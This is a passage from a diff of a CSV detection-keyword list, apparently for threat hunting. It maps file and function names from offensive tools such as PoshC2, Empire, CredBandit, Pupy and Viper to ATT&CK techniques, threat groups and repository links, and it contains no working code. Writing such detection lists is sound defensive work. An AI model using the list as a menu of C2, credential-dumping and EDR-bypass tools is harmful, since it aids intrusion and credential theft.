TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" -"*createnewshellcode*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" -"*createpbindpayload*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*createdaisypayload*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*createlinuxpayload*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*Create-MultipleSessions.ps1*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7851","2361","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" +"*Create-NamedPipe*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*createnewpayload*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*createnewshellcode*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*createpbindpayload*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" "*CreateProcessAsUser*","offensive_tool_keyword","RunasCs","RunasCs is an utility to run specific processes with different permissions than the user's current logon provides using explicit credential","T1055 - T1134.001","TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/RunasCs","1","0","N/A","N/A","8","722","107","2023-05-20T01:19:52Z","2019-08-08T20:18:18Z" -"*createproxypayload -*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" -"*createproxypayload*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" -"*Create-SuspendedWinLogon*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Create-WinLogonProcess*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*createproxypayload -*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*createproxypayload*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*Create-SuspendedWinLogon*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Create-WinLogonProcess*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*credBandit * output*","offensive_tool_keyword","cobaltstrike","Proof of concept Beacon Object File (BOF) that uses static x64 syscalls to perform a complete in memory dump of a process and send that back through your already existing Beacon communication channel","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/xforcered/CredBandit","1","0","N/A","10","10","218","25","2021-07-14T17:42:41Z","2021-03-17T15:19:33Z" "*credBandit.*","offensive_tool_keyword","cobaltstrike","Proof of concept Beacon Object File (BOF) that uses static x64 syscalls to perform a complete in memory dump of a process and send that back through your already existing Beacon communication channel","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/xforcered/CredBandit","1","1","N/A","10","10","218","25","2021-07-14T17:42:41Z","2021-03-17T15:19:33Z" "*credBanditx64*","offensive_tool_keyword","cobaltstrike","Proof of concept Beacon Object File (BOF) that uses static x64 syscalls to perform a complete in memory dump of a process and send that back through your already existing Beacon communication channel","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/xforcered/CredBandit","1","1","N/A","10","10","218","25","2021-07-14T17:42:41Z","2021-03-17T15:19:33Z" -"*creddump.py*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7841","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" -"*Credential Guard bypass might fail if RunAsPPL is enabled*","offensive_tool_keyword","EDRSandblast-GodFault","Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/gabriellandau/EDRSandblast-GodFault","1","0","N/A","10","2","180","34","2023-08-28T18:14:20Z","2023-06-01T19:32:09Z" +"*creddump.py*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*Credential Guard bypass might fail if RunAsPPL is enabled*","offensive_tool_keyword","EDRSandblast-GodFault","Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/gabriellandau/EDRSandblast-GodFault","1","0","N/A","10","2","183","35","2023-08-28T18:14:20Z","2023-06-01T19:32:09Z" "*CredentialAccess_CredentialDumping_BrowserDataCSharp.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" "*CredentialAccess_CredentialDumping_KiwiOnLocal.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" "*CredentialAccess_CredentialDumping_SunLogin.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" @@ -8856,34 +9004,34 @@ "*CredentialAccess_CredentialInFiles_WindowsSoftware.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" "*CredentialAccess_InputCapture_CredUIPromptForWindowsCredentialsW.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" "*Credentials Found in Configurations!*","offensive_tool_keyword","SeeYouCM-Thief","Simple tool to automatically download and parse configuration files from Cisco phone systems searching for SSH credentials","T1110.001 - T1005 - T1071.001","TA0001 - TA0011 - TA0005","N/A","N/A","Discovery","https://github.com/trustedsec/SeeYouCM-Thief","1","0","N/A","9","2","149","30","2023-05-11T01:04:36Z","2022-01-14T20:12:25Z" -"*Credentials*hekatomb_*.txt","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*Credentials*hekatomb_*.txt","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" "*Credentials/CacheDump.*","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","1","N/A","10","10","286","66","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z" -"*Credentials/certsync_*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*Credentials/certsync_*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory 